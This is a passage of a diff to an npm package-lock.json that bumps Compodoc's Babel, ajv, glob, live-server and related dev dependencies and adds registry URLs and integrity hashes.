^14.15.0 || >=16.10.0", + "npm": "^6.11.0 || ^7.5.6 || >=8.0.0", + "yarn": ">= 1.13.0" }, - "funding": { - "type": "opencollective", - "url": "https://opencollective.com/babel" + "peerDependencies": { + "chokidar": "^3.5.2" + }, + "peerDependenciesMeta": { + "chokidar": { + "optional": true + } } }, - "node_modules/@compodoc/compodoc/node_modules/@babel/core/node_modules/semver": { - "version": "6.3.0", + "node_modules/@compodoc/compodoc/node_modules/@angular-devkit/schematics": { + "version": "13.2.4", + "resolved": "https://registry.npmjs.org/@angular-devkit/schematics/-/schematics-13.2.4.tgz", + "integrity": "sha512-VMhYa4cDu5yE31OvHncAd15Rmlchih/Sr6sxFsIwkg4xzRNIIZCtwqxVXgf0TiTN9zrvlvzK7nhPqTGNqqYb2A==", + "dev": true, + "dependencies": { + "@angular-devkit/core": "13.2.4", + "jsonc-parser": "3.0.0", + "magic-string": "0.25.7", + "ora": "5.4.1", + "rxjs": "6.6.7" + }, + "engines": { + "node": "^12.20.0 || ^14.15.0 || >=16.10.0", + "npm": "^6.11.0 || ^7.5.6 || >=8.0.0", + "yarn": ">= 1.13.0" + } + }, + "node_modules/@compodoc/compodoc/node_modules/@babel/core": { + "version": "7.17.5", + "resolved": "https://registry.npmjs.org/@babel/core/-/core-7.17.5.tgz", + "integrity": "sha512-/BBMw4EvjmyquN5O+t5eh0+YqB3XXJkYD2cjKpYtWOfFy4lQ4UozNSmxAcWT8r2XtZs0ewG+zrfsqeR15i1ajA==", + "dev": true, + "dependencies": { + "@ampproject/remapping": "^2.1.0", + "@babel/code-frame": "^7.16.7", + "@babel/generator": "^7.17.3", + "@babel/helper-compilation-targets": "^7.16.7", + "@babel/helper-module-transforms": "^7.16.7", + "@babel/helpers": "^7.17.2", + "@babel/parser": "^7.17.3", + "@babel/template": "^7.16.7", + "@babel/traverse": "^7.17.3", + "@babel/types": "^7.17.0", + "convert-source-map": "^1.7.0", + "debug": "^4.1.0", + "gensync": "^1.0.0-beta.2", + "json5": "^2.1.2", + "semver": "^6.3.0" + }, + "engines": { + "node": ">=6.9.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/babel" + } + }, + "node_modules/@compodoc/compodoc/node_modules/@babel/core/node_modules/semver": { + "version": "6.3.0", + "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.0.tgz", + "integrity": "sha512-b39TBaTSfV6yBrapU89p5fKekE2m/NwnDocOVruQFS1/veMgdzuPcnOM34M6CwxW8jH/lxEa5rBoDeUwu5HHTw==", "dev": true, - "license": "ISC", "bin": { "semver": "bin/semver.js" } }, "node_modules/@compodoc/compodoc/node_modules/@babel/generator": { - "version": "7.15.0", + "version": "7.17.3", + "resolved": "https://registry.npmjs.org/@babel/generator/-/generator-7.17.3.tgz", + "integrity": "sha512-+R6Dctil/MgUsZsZAkYgK+ADNSZzJRRy0TvY65T71z/CR854xHQ1EweBYXdfT+HNeN7w0cSJJEzgxZMv40pxsg==", "dev": true, - "license": "MIT", "dependencies": { - "@babel/types": "^7.15.0", + "@babel/types": "^7.17.0", "jsesc": "^2.5.1", "source-map": "^0.5.0" }, @@ -2652,56 +2824,87 @@ "node": ">=6.9.0" } }, - "node_modules/@compodoc/compodoc/node_modules/@babel/helper-compilation-targets": { - "version": "7.15.0", + "node_modules/@compodoc/compodoc/node_modules/@babel/generator/node_modules/source-map": { + "version": "0.5.7", + "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.5.7.tgz", + "integrity": "sha1-igOdLRAh0i0eoUyA2OpGi6LvP8w=", "dev": true, - "license": "MIT", - "dependencies": { - "@babel/compat-data": "^7.15.0", - "@babel/helper-validator-option": "^7.14.5", - "browserslist": "^4.16.6", - "semver": "^6.3.0" - }, "engines": { - "node": ">=6.9.0" + "node": ">=0.10.0" + } + }, + "node_modules/@compodoc/compodoc/node_modules/@babel/helper-define-polyfill-provider": { + "version": "0.3.1", + "resolved": "https://registry.npmjs.org/@babel/helper-define-polyfill-provider/-/helper-define-polyfill-provider-0.3.1.tgz", + "integrity": "sha512-J9hGMpJQmtWmj46B3kBHmL38UhJGhYX7eqkcq+2gsstyYt341HmPeWspihX43yVRA0mS+8GGk2Gckc7bY/HCmA==", + "dev": true, + "dependencies": { + "@babel/helper-compilation-targets": "^7.13.0", + "@babel/helper-module-imports": "^7.12.13", + "@babel/helper-plugin-utils": "^7.13.0", + "@babel/traverse": "^7.13.0", + "debug": "^4.1.1", + "lodash.debounce": "^4.0.8", + "resolve": "^1.14.2", + "semver": "^6.1.2" }, "peerDependencies": { - "@babel/core": "^7.0.0" + "@babel/core": "^7.4.0-0" } }, - "node_modules/@compodoc/compodoc/node_modules/@babel/helper-compilation-targets/node_modules/semver": { + "node_modules/@compodoc/compodoc/node_modules/@babel/helper-define-polyfill-provider/node_modules/semver": { "version": "6.3.0", + "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.0.tgz", + "integrity": "sha512-b39TBaTSfV6yBrapU89p5fKekE2m/NwnDocOVruQFS1/veMgdzuPcnOM34M6CwxW8jH/lxEa5rBoDeUwu5HHTw==", "dev": true, - "license": "ISC", "bin": { "semver": "bin/semver.js" } }, - "node_modules/@compodoc/compodoc/node_modules/@babel/preset-env": { - "version": "7.15.0", + "node_modules/@compodoc/compodoc/node_modules/@babel/plugin-transform-async-to-generator": { + "version": "7.16.8", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-async-to-generator/-/plugin-transform-async-to-generator-7.16.8.tgz", + "integrity": "sha512-MtmUmTJQHCnyJVrScNzNlofQJ3dLFuobYn3mwOTKHnSCMtbNsqvF71GQmJfFjdrXSsAA7iysFmYWw4bXZ20hOg==", "dev": true, - "license": "MIT", "dependencies": { - "@babel/compat-data": "^7.15.0", - "@babel/helper-compilation-targets": "^7.15.0", - "@babel/helper-plugin-utils": "^7.14.5", - "@babel/helper-validator-option": "^7.14.5", - "@babel/plugin-bugfix-v8-spread-parameters-in-optional-chaining": "^7.14.5", - "@babel/plugin-proposal-async-generator-functions": "^7.14.9", - "@babel/plugin-proposal-class-properties": "^7.14.5", - "@babel/plugin-proposal-class-static-block": "^7.14.5", - "@babel/plugin-proposal-dynamic-import": "^7.14.5", - "@babel/plugin-proposal-export-namespace-from": "^7.14.5", - "@babel/plugin-proposal-json-strings": "^7.14.5", - "@babel/plugin-proposal-logical-assignment-operators": "^7.14.5", - "@babel/plugin-proposal-nullish-coalescing-operator": "^7.14.5", - "@babel/plugin-proposal-numeric-separator": "^7.14.5", - "@babel/plugin-proposal-object-rest-spread": "^7.14.7", - "@babel/plugin-proposal-optional-catch-binding": "^7.14.5", - "@babel/plugin-proposal-optional-chaining": "^7.14.5", - "@babel/plugin-proposal-private-methods": "^7.14.5", - "@babel/plugin-proposal-private-property-in-object": "^7.14.5", - "@babel/plugin-proposal-unicode-property-regex": "^7.14.5", + "@babel/helper-module-imports": "^7.16.7", + "@babel/helper-plugin-utils": "^7.16.7", + "@babel/helper-remap-async-to-generator": "^7.16.8" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@compodoc/compodoc/node_modules/@babel/preset-env": { + "version": "7.16.11", + "resolved": "https://registry.npmjs.org/@babel/preset-env/-/preset-env-7.16.11.tgz", + "integrity": "sha512-qcmWG8R7ZW6WBRPZK//y+E3Cli151B20W1Rv7ln27vuPaXU/8TKms6jFdiJtF7UDTxcrb7mZd88tAeK9LjdT8g==", + "dev": true, + "dependencies": { + "@babel/compat-data": "^7.16.8", + "@babel/helper-compilation-targets": "^7.16.7", + "@babel/helper-plugin-utils": "^7.16.7", + "@babel/helper-validator-option": "^7.16.7", + "@babel/plugin-bugfix-safari-id-destructuring-collision-in-function-expression": "^7.16.7", + "@babel/plugin-bugfix-v8-spread-parameters-in-optional-chaining": "^7.16.7", + "@babel/plugin-proposal-async-generator-functions": "^7.16.8", + "@babel/plugin-proposal-class-properties": "^7.16.7", + "@babel/plugin-proposal-class-static-block": "^7.16.7", + "@babel/plugin-proposal-dynamic-import": "^7.16.7", + "@babel/plugin-proposal-export-namespace-from": "^7.16.7", + "@babel/plugin-proposal-json-strings": "^7.16.7", + "@babel/plugin-proposal-logical-assignment-operators": "^7.16.7", + "@babel/plugin-proposal-nullish-coalescing-operator": "^7.16.7", + "@babel/plugin-proposal-numeric-separator": "^7.16.7", + "@babel/plugin-proposal-object-rest-spread": "^7.16.7", + "@babel/plugin-proposal-optional-catch-binding": "^7.16.7", + "@babel/plugin-proposal-optional-chaining": "^7.16.7", + "@babel/plugin-proposal-private-methods": "^7.16.11", + "@babel/plugin-proposal-private-property-in-object": "^7.16.7", + "@babel/plugin-proposal-unicode-property-regex": "^7.16.7", "@babel/plugin-syntax-async-generators": "^7.8.4", "@babel/plugin-syntax-class-properties": "^7.12.13", "@babel/plugin-syntax-class-static-block": "^7.14.5", @@ -2716,44 +2919,44 @@ "@babel/plugin-syntax-optional-chaining": "^7.8.3", "@babel/plugin-syntax-private-property-in-object": "^7.14.5", "@babel/plugin-syntax-top-level-await": "^7.14.5", - "@babel/plugin-transform-arrow-functions": "^7.14.5", - "@babel/plugin-transform-async-to-generator": "^7.14.5", - "@babel/plugin-transform-block-scoped-functions": "^7.14.5", - "@babel/plugin-transform-block-scoping": "^7.14.5", - "@babel/plugin-transform-classes": "^7.14.9", - "@babel/plugin-transform-computed-properties": "^7.14.5", - "@babel/plugin-transform-destructuring": "^7.14.7", - "@babel/plugin-transform-dotall-regex": "^7.14.5", - "@babel/plugin-transform-duplicate-keys": "^7.14.5", - "@babel/plugin-transform-exponentiation-operator": "^7.14.5", - "@babel/plugin-transform-for-of": "^7.14.5", - "@babel/plugin-transform-function-name": "^7.14.5", - "@babel/plugin-transform-literals": "^7.14.5", - "@babel/plugin-transform-member-expression-literals": "^7.14.5", - "@babel/plugin-transform-modules-amd": "^7.14.5", - "@babel/plugin-transform-modules-commonjs": "^7.15.0", - "@babel/plugin-transform-modules-systemjs": "^7.14.5", - "@babel/plugin-transform-modules-umd": "^7.14.5", - "@babel/plugin-transform-named-capturing-groups-regex": "^7.14.9", - "@babel/plugin-transform-new-target": "^7.14.5", - "@babel/plugin-transform-object-super": "^7.14.5", - "@babel/plugin-transform-parameters": "^7.14.5", - "@babel/plugin-transform-property-literals": "^7.14.5", - "@babel/plugin-transform-regenerator": "^7.14.5", - "@babel/plugin-transform-reserved-words": "^7.14.5", - "@babel/plugin-transform-shorthand-properties": "^7.14.5", - "@babel/plugin-transform-spread": "^7.14.6", - "@babel/plugin-transform-sticky-regex": "^7.14.5", - "@babel/plugin-transform-template-literals": "^7.14.5", - "@babel/plugin-transform-typeof-symbol": "^7.14.5", - "@babel/plugin-transform-unicode-escapes": "^7.14.5", - "@babel/plugin-transform-unicode-regex": "^7.14.5", - "@babel/preset-modules": "^0.1.4", - "@babel/types": "^7.15.0", - "babel-plugin-polyfill-corejs2": "^0.2.2", - "babel-plugin-polyfill-corejs3": "^0.2.2", - "babel-plugin-polyfill-regenerator": "^0.2.2", - "core-js-compat": "^3.16.0", + "@babel/plugin-transform-arrow-functions": "^7.16.7", + "@babel/plugin-transform-async-to-generator": "^7.16.8", + "@babel/plugin-transform-block-scoped-functions": "^7.16.7", + "@babel/plugin-transform-block-scoping": "^7.16.7", + "@babel/plugin-transform-classes": "^7.16.7", + "@babel/plugin-transform-computed-properties": "^7.16.7", + "@babel/plugin-transform-destructuring": "^7.16.7", + "@babel/plugin-transform-dotall-regex": "^7.16.7", + "@babel/plugin-transform-duplicate-keys": "^7.16.7", + "@babel/plugin-transform-exponentiation-operator": "^7.16.7", + "@babel/plugin-transform-for-of": "^7.16.7", + "@babel/plugin-transform-function-name": "^7.16.7", + "@babel/plugin-transform-literals": "^7.16.7", + "@babel/plugin-transform-member-expression-literals": "^7.16.7", + "@babel/plugin-transform-modules-amd": "^7.16.7", + "@babel/plugin-transform-modules-commonjs": "^7.16.8", + "@babel/plugin-transform-modules-systemjs": "^7.16.7", + "@babel/plugin-transform-modules-umd": "^7.16.7", + "@babel/plugin-transform-named-capturing-groups-regex": "^7.16.8", + "@babel/plugin-transform-new-target": "^7.16.7", + "@babel/plugin-transform-object-super": "^7.16.7", + "@babel/plugin-transform-parameters": "^7.16.7", + "@babel/plugin-transform-property-literals": "^7.16.7", + "@babel/plugin-transform-regenerator": "^7.16.7", + "@babel/plugin-transform-reserved-words": "^7.16.7", + "@babel/plugin-transform-shorthand-properties": "^7.16.7", + "@babel/plugin-transform-spread": "^7.16.7", + "@babel/plugin-transform-sticky-regex": "^7.16.7", + "@babel/plugin-transform-template-literals": "^7.16.7", + "@babel/plugin-transform-typeof-symbol": "^7.16.7", + "@babel/plugin-transform-unicode-escapes": "^7.16.7", + "@babel/plugin-transform-unicode-regex": "^7.16.7", + "@babel/preset-modules": "^0.1.5", + "@babel/types": "^7.16.8", + "babel-plugin-polyfill-corejs2": "^0.3.0", + "babel-plugin-polyfill-corejs3": "^0.5.0", + "babel-plugin-polyfill-regenerator": "^0.3.0", + "core-js-compat": "^3.20.2", "semver": "^6.3.0" }, "engines": { @@ -2765,19 +2968,106 @@ }, "node_modules/@compodoc/compodoc/node_modules/@babel/preset-env/node_modules/semver": { "version": "6.3.0", + "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.0.tgz", + "integrity": "sha512-b39TBaTSfV6yBrapU89p5fKekE2m/NwnDocOVruQFS1/veMgdzuPcnOM34M6CwxW8jH/lxEa5rBoDeUwu5HHTw==", "dev": true, - "license": "ISC", "bin": { "semver": "bin/semver.js" } }, - "node_modules/@compodoc/compodoc/node_modules/caniuse-lite": { - "version": "1.0.30001251", + "node_modules/@compodoc/compodoc/node_modules/@babel/template": { + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/template/-/template-7.16.7.tgz", + "integrity": "sha512-I8j/x8kHUrbYRTUxXrrMbfCa7jxkE7tZre39x3kjr9hvI82cK1FfqLygotcWN5kdPGWcLdWMHpSBavse5tWw3w==", + "dev": true, + "dependencies": { + "@babel/code-frame": "^7.16.7", + "@babel/parser": "^7.16.7", + "@babel/types": "^7.16.7" + }, + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@compodoc/compodoc/node_modules/ajv": { + "version": "8.9.0", + "resolved": "https://registry.npmjs.org/ajv/-/ajv-8.9.0.tgz", + "integrity": "sha512-qOKJyNj/h+OWx7s5DePL6Zu1KeM9jPZhwBqs+7DzP6bGOvqzVCSf0xueYmVuaC/oQ/VtS2zLMLHdQFbkka+XDQ==", "dev": true, - "license": "CC-BY-4.0", + "dependencies": { + "fast-deep-equal": "^3.1.1", + "json-schema-traverse": "^1.0.0", + "require-from-string": "^2.0.2", + "uri-js": "^4.2.2" + }, "funding": { - "type": "opencollective", - "url": "https://opencollective.com/browserslist" + "type": "github", + "url": "https://github.com/sponsors/epoberezkin" + } + }, + "node_modules/@compodoc/compodoc/node_modules/ajv-formats": { + "version": "2.1.1", + "resolved": "https://registry.npmjs.org/ajv-formats/-/ajv-formats-2.1.1.tgz", + "integrity": "sha512-Wx0Kx52hxE7C18hkMEggYlEifqWZtYaRgouJor+WMdPnQyEK13vgEWyVNup7SoeeoLMsr4kf5h6dOW11I15MUA==", + "dev": true, + "dependencies": { + "ajv": "^8.0.0" + }, + "peerDependencies": { + "ajv": "^8.0.0" + }, + "peerDependenciesMeta": { + "ajv": { + "optional": true + } + } + }, + "node_modules/@compodoc/compodoc/node_modules/babel-plugin-polyfill-corejs2": { + "version": "0.3.1", + "resolved": "https://registry.npmjs.org/babel-plugin-polyfill-corejs2/-/babel-plugin-polyfill-corejs2-0.3.1.tgz", + "integrity": "sha512-v7/T6EQcNfVLfcN2X8Lulb7DjprieyLWJK/zOWH5DUYcAgex9sP3h25Q+DLsX9TloXe3y1O8l2q2Jv9q8UVB9w==", + "dev": true, + "dependencies": { + "@babel/compat-data": "^7.13.11", + "@babel/helper-define-polyfill-provider": "^0.3.1", + "semver": "^6.1.1" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@compodoc/compodoc/node_modules/babel-plugin-polyfill-corejs2/node_modules/semver": { + "version": "6.3.0", + "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.0.tgz", + "integrity": "sha512-b39TBaTSfV6yBrapU89p5fKekE2m/NwnDocOVruQFS1/veMgdzuPcnOM34M6CwxW8jH/lxEa5rBoDeUwu5HHTw==", + "dev": true, + "bin": { + "semver": "bin/semver.js" + } + }, + "node_modules/@compodoc/compodoc/node_modules/babel-plugin-polyfill-corejs3": { + "version": "0.5.2", + "resolved": "https://registry.npmjs.org/babel-plugin-polyfill-corejs3/-/babel-plugin-polyfill-corejs3-0.5.2.tgz", + "integrity": "sha512-G3uJih0XWiID451fpeFaYGVuxHEjzKTHtc9uGFEjR6hHrvNzeS/PX+LLLcetJcytsB5m4j+K3o/EpXJNb/5IEQ==", + "dev": true, + "dependencies": { + "@babel/helper-define-polyfill-provider": "^0.3.1", + "core-js-compat": "^3.21.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@compodoc/compodoc/node_modules/babel-plugin-polyfill-regenerator": { + "version": "0.3.1", + "resolved": "https://registry.npmjs.org/babel-plugin-polyfill-regenerator/-/babel-plugin-polyfill-regenerator-0.3.1.tgz", + "integrity": "sha512-Y2B06tvgHYt1x0yz17jGkGeeMr5FeKUu+ASJ+N6nB5lQ8Dapfg42i0OVrf8PNGJ3zKL4A23snMi1IRwrqqND7A==", + "dev": true, + "dependencies": { + "@babel/helper-define-polyfill-provider": "^0.3.1" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" } }, "node_modules/@compodoc/compodoc/node_modules/chalk": { @@ -2836,66 +3126,20 @@ "dev": true, "license": "MIT" }, - "node_modules/@compodoc/compodoc/node_modules/colorette": { - "version": "1.3.0", - "dev": true, - "license": "MIT" - }, "node_modules/@compodoc/compodoc/node_modules/commander": { - "version": "8.1.0", + "version": "8.3.0", + "resolved": "https://registry.npmjs.org/commander/-/commander-8.3.0.tgz", + "integrity": "sha512-OkTL9umf+He2DZkUq8f8J9of7yL6RJKI24dVITBmNfZBmri9zYZQrKkuXiKhyfPSu8tUhnVBB1iKXevvnlR4Ww==", "dev": true, - "license": "MIT", "engines": { "node": ">= 12" } }, - "node_modules/@compodoc/compodoc/node_modules/core-js-compat": { - "version": "3.16.2", - "dev": true, - "license": "MIT", - "dependencies": { - "browserslist": "^4.16.7", - "semver": "7.0.0" - }, - "funding": { - "type": "opencollective", - "url": "https://opencollective.com/core-js" - } - }, - "node_modules/@compodoc/compodoc/node_modules/core-js-compat/node_modules/browserslist": { - "version": "4.16.8", - "dev": true, - "license": "MIT", - "dependencies": { - "caniuse-lite": "^1.0.30001251", - "colorette": "^1.3.0", - "electron-to-chromium": "^1.3.811", - "escalade": "^3.1.1", - "node-releases": "^1.1.75" - }, - "bin": { - "browserslist": "cli.js" - }, - "engines": { - "node": "^6 || ^7 || ^8 || ^9 || ^10 || ^11 || ^12 || >=13.7" - }, - "funding": { - "type": "opencollective", - "url": "https://opencollective.com/browserslist" - } - }, - "node_modules/@compodoc/compodoc/node_modules/core-js-compat/node_modules/semver": { - "version": "7.0.0", - "dev": true, - "license": "ISC", - "bin": { - "semver": "bin/semver.js" - } - }, "node_modules/@compodoc/compodoc/node_modules/debug": { - "version": "4.3.2", + "version": "4.3.3", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.3.tgz", + "integrity": "sha512-/zxw5+vh1Tfv+4Qn7a5nsbcJKPaSvCDhojn6FEl9vupwK2VCSDtEiEtqr8DFtzYFOdz63LBkxec7DYuc2jon6Q==", "dev": true, - "license": "MIT", "dependencies": { "ms": "2.1.2" }, @@ -2908,22 +3152,36 @@ } } }, - "node_modules/@compodoc/compodoc/node_modules/electron-to-chromium": { - "version": "1.3.814", + "node_modules/@compodoc/compodoc/node_modules/fancy-log": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/fancy-log/-/fancy-log-2.0.0.tgz", + "integrity": "sha512-9CzxZbACXMUXW13tS0tI8XsGGmxWzO2DmYrGuBJOJ8k8q2K7hwfJA5qHjuPPe8wtsco33YR9wc+Rlr5wYFvhSA==", "dev": true, - "license": "ISC" + "dependencies": { + "color-support": "^1.1.3" + }, + "engines": { + "node": ">=10.13.0" + } }, - "node_modules/@compodoc/compodoc/node_modules/fs-extra": { - "version": "10.0.0", + "node_modules/@compodoc/compodoc/node_modules/glob": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.0.tgz", + "integrity": "sha512-lmLf6gtyrPq8tTjSmrO94wBeQbFR3HbLHbuyD69wuyQkImp2hWqMGB47OX65FBkPffO641IP9jWa1z4ivqG26Q==", "dev": true, - "license": "MIT", "dependencies": { - "graceful-fs": "^4.2.0", - "jsonfile": "^6.0.1", - "universalify": "^2.0.0" + "fs.realpath": "^1.0.0", + "inflight": "^1.0.4", + "inherits": "2", + "minimatch": "^3.0.4", + "once": "^1.3.0", + "path-is-absolute": "^1.0.0" }, "engines": { - "node": ">=12" + "node": "*" + }, + "funding": { + "url": "https://github.com/sponsors/isaacs" } }, "node_modules/@compodoc/compodoc/node_modules/has-flag": { @@ -2939,40 +3197,17 @@ "dev": true, "license": "MIT" }, - "node_modules/@compodoc/compodoc/node_modules/json5": { - "version": "2.2.0", - "dev": true, - "license": "MIT", - "dependencies": { - "minimist": "^1.2.5" - }, - "bin": { - "json5": "lib/cli.js" - }, - "engines": { - "node": ">=6" - } - }, - "node_modules/@compodoc/compodoc/node_modules/jsonfile": { - "version": "6.1.0", - "dev": true, - "license": "MIT", - "dependencies": { - "universalify": "^2.0.0" - }, - "optionalDependencies": { - "graceful-fs": "^4.1.6" - } + "node_modules/@compodoc/compodoc/node_modules/json-schema-traverse": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-1.0.0.tgz", + "integrity": "sha512-NM8/P9n3XjXhIZn1lLhkFaACTOURQXjWhV4BA/RnOv8xvgqtqpAX9IO4mRQxSx1Rlo4tqzeqb0sOlruaOy3dug==", + "dev": true }, "node_modules/@compodoc/compodoc/node_modules/ms": { "version": "2.1.2", - "dev": true, - "license": "MIT" - }, - "node_modules/@compodoc/compodoc/node_modules/node-releases": { - "version": "1.1.75", - "dev": true, - "license": "MIT" + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", + "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", + "dev": true }, "node_modules/@compodoc/compodoc/node_modules/semver": { "version": "7.3.5", @@ -2988,22 +3223,6 @@ "node": ">=10" } }, - "node_modules/@compodoc/compodoc/node_modules/source-map": { - "version": "0.5.7", - "dev": true, - "license": "BSD-3-Clause", - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/@compodoc/compodoc/node_modules/universalify": { - "version": "2.0.0", - "dev": true, - "license": "MIT", - "engines": { - "node": ">= 10.0.0" - } - }, "node_modules/@compodoc/compodoc/node_modules/uuid": { "version": "8.3.2", "dev": true, @@ -3013,21 +3232,22 @@ } }, "node_modules/@compodoc/live-server": { - "version": "1.2.2", + "version": "1.2.3", + "resolved": "https://registry.npmjs.org/@compodoc/live-server/-/live-server-1.2.3.tgz", + "integrity": "sha512-hDmntVCyjjaxuJzPzBx68orNZ7TW4BtHWMnXlIVn5dqhK7vuFF/11hspO1cMmc+2QTYgqde1TBcb3127S7Zrow==", "dev": true, - "license": "MIT", "dependencies": { "chokidar": "^3.5.2", - "colors": "latest", + "colors": "1.4.0", "connect": "^3.7.0", "cors": "latest", "event-stream": "4.0.1", "faye-websocket": "0.11.x", - "http-auth": "4.1.7", + "http-auth": "4.1.9", "http-auth-connect": "^1.0.5", "morgan": "^1.10.0", "object-assign": "latest", - "open": "8.2.1", + "open": "8.4.0", "proxy-middleware": "latest", "send": "latest", "serve-index": "^1.9.1" @@ -3036,7 +3256,91 @@ "live-server": "live-server.js" }, "engines": { - "node": ">=0.10.0" + "node": ">=0.10.0" + } + }, + "node_modules/@compodoc/live-server/node_modules/http-errors": { + "version": "1.8.1", + "resolved": "https://registry.npmjs.org/http-errors/-/http-errors-1.8.1.tgz", + "integrity": "sha512-Kpk9Sm7NmI+RHhnj6OIWDI1d6fIoFAtFt9RLaTMRlg/8w49juAStsrBgp0Dp4OdxdVbRIeKhtCUvoi/RuAhO4g==", + "dev": true, + "dependencies": { + "depd": "~1.1.2", + "inherits": "2.0.4", + "setprototypeof": "1.2.0", + "statuses": ">= 1.5.0 < 2", + "toidentifier": "1.0.1" + }, + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/@compodoc/live-server/node_modules/inherits": { + "version": "2.0.4", + "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", + "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==", + "dev": true + }, + "node_modules/@compodoc/live-server/node_modules/ms": { + "version": "2.1.3", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.3.tgz", + "integrity": "sha512-6FlzubTLZG3J2a/NVCAleEhjzq5oxgHyaCU9yYXvcLsvoVaHJq/s5xXI6/XXP6tz7R9xAOtHnSO/tXtF3WRTlA==", + "dev": true + }, + "node_modules/@compodoc/live-server/node_modules/open": { + "version": "8.4.0", + "resolved": "https://registry.npmjs.org/open/-/open-8.4.0.tgz", + "integrity": "sha512-XgFPPM+B28FtCCgSb9I+s9szOC1vZRSwgWsRUA5ylIxRTgKozqjOCrVOqGsYABPYK5qnfqClxZTFBa8PKt2v6Q==", + "dev": true, + "dependencies": { + "define-lazy-prop": "^2.0.0", + "is-docker": "^2.1.1", + "is-wsl": "^2.2.0" + }, + "engines": { + "node": ">=12" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/@compodoc/live-server/node_modules/send": { + "version": "0.17.2", + "resolved": "https://registry.npmjs.org/send/-/send-0.17.2.tgz", + "integrity": "sha512-UJYB6wFSJE3G00nEivR5rgWp8c2xXvJ3OPWPhmuteU0IKj8nKbG3DrjiOmLwpnHGYWAVwA69zmTm++YG0Hmwww==", + "dev": true, + "dependencies": { + "debug": "2.6.9", + "depd": "~1.1.2", + "destroy": "~1.0.4", + "encodeurl": "~1.0.2", + "escape-html": "~1.0.3", + "etag": "~1.8.1", + "fresh": "0.5.2", + "http-errors": "1.8.1", + "mime": "1.6.0", + "ms": "2.1.3", + "on-finished": "~2.3.0", + "range-parser": "~1.2.1", + "statuses": "~1.5.0" + }, + "engines": { + "node": ">= 0.8.0" + } + }, + "node_modules/@compodoc/live-server/node_modules/setprototypeof": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/setprototypeof/-/setprototypeof-1.2.0.tgz", + "integrity": "sha512-E5LDX7Wrp85Kil5bhZv46j8jOeboKq5JMmYM3gVGdGH8xFpPWXUMsNrlODCrkoxMEeNi/XZIwuRvY4XNwYMJpw==", + "dev": true + }, + "node_modules/@compodoc/live-server/node_modules/toidentifier": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/toidentifier/-/toidentifier-1.0.1.tgz", + "integrity": "sha512-o5sSPKEkg/DIQNmH43V0/uerLrpzVedkUh8tGNvaeXpfpuwjKenlSox/2O/BTlZUtEe+JG7s5YhEz608PlAHRA==", + "dev": true, + "engines": { + "node": ">=0.6" } }, "node_modules/@compodoc/ngd-core": { @@ -3080,25 +3384,6 @@ "node": ">=10" } }, - "node_modules/@compodoc/ngd-transformer/node_modules/jsonfile": { - "version": "6.1.0", - "dev": true, - "license": "MIT", - "dependencies": { - "universalify": "^2.0.0" - }, - "optionalDependencies": { - "graceful-fs": "^4.1.6" - } - }, - "node_modules/@compodoc/ngd-transformer/node_modules/universalify": { - "version": "2.0.0", - "dev": true, - "license": "MIT", - "engines": { - "node": ">= 10.0.0" - } - }, "node_modules/@csstools/convert-colors": { "version": "1.4.0", "dev": true, @@ -3117,8 +3402,9 @@ }, "node_modules/@foliojs-fork/fontkit": { "version": "1.9.1", + "resolved": "https://registry.npmjs.org/@foliojs-fork/fontkit/-/fontkit-1.9.1.tgz", + "integrity": "sha512-U589voc2/ROnvx1CyH9aNzOQWJp127JGU1QAylXGQ7LoEAF6hMmahZLQ4eqAcgHUw+uyW4PjtCItq9qudPkK3A==", "dev": true, - "license": "MIT", "dependencies": { "@foliojs-fork/restructure": "^2.0.2", "brfs": "^2.0.0", @@ -3134,8 +3420,9 @@ }, "node_modules/@foliojs-fork/linebreak": { "version": "1.1.1", + "resolved": "https://registry.npmjs.org/@foliojs-fork/linebreak/-/linebreak-1.1.1.tgz", + "integrity": "sha512-pgY/+53GqGQI+mvDiyprvPWgkTlVBS8cxqee03ejm6gKAQNsR1tCYCIvN9FHy7otZajzMqCgPOgC4cHdt4JPig==", "dev": true, - "license": "MIT", "dependencies": { "base64-js": "1.3.1", "brfs": "^2.0.2", @@ -3143,9 +3430,10 @@ } }, "node_modules/@foliojs-fork/pdfkit": { - "version": "0.12.3", + "version": "0.13.0", + "resolved": "https://registry.npmjs.org/@foliojs-fork/pdfkit/-/pdfkit-0.13.0.tgz", + "integrity": "sha512-YXeG1fml9k97YNC9K8e292Pj2JzGt9uOIiBFuQFxHsdQ45BlxW+JU3RQK6JAvXU7kjhjP8rCcYvpk36JLD33sQ==", "dev": true, - "license": "MIT", "dependencies": { "@foliojs-fork/fontkit": "^1.9.1", "@foliojs-fork/linebreak": "^1.1.1", @@ -3155,8 